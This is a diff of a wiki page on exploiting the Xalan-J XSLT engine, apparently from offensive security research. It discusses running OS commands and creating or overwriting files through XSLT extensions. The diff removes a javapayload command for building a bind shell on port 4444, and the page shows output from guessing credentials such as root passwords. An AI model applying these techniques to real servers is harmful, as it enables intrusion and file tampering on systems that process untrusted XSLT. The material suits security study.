Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35

From version Icon 73.1 Icon
edited by Nicolas Gregoire
on 2012/01/17 09:27
Change comment: There is no comment for this version
To version Icon 69.1 Icon
edited by Nicolas Gregoire
on 2012/01/14 17:46
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -77,16 +77,10 @@
77 77  
78 78  It is of course possible to include commands for multiples OS in one file and to execute only the relevant ones.
79 79  
80 -= Pure Java reverse-shell =
80 +== A pure Java reverse-shell ==
81 81  
82 82  It is afaik not possible to get a pure Java reverse-shell, as we can't create threads :-(
83 83  
84 -{{warning}}
85 -TODO : javapayload => loading arbitrary byte code (aka classes) via reflection
86 -$> java javapayload.builder.Builder Template XalanJ.xsl bind-jsh-4444.xsl BindTCP 127.0.0.1 4444 - - JSh
87 -Check supported versions of Xalan !
88 -{{/warning}}
89 -
90 90  = File creation =
91 91  
92 92  The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten.
... ... @@ -117,3 +117,4 @@
117 117  Username : [root] / Password : [uberpasswd] :
118 118  Username : [root] / Password : [cnam] : OK !!
119 119  Username : [pma] / Password : [pma] : ##
114 +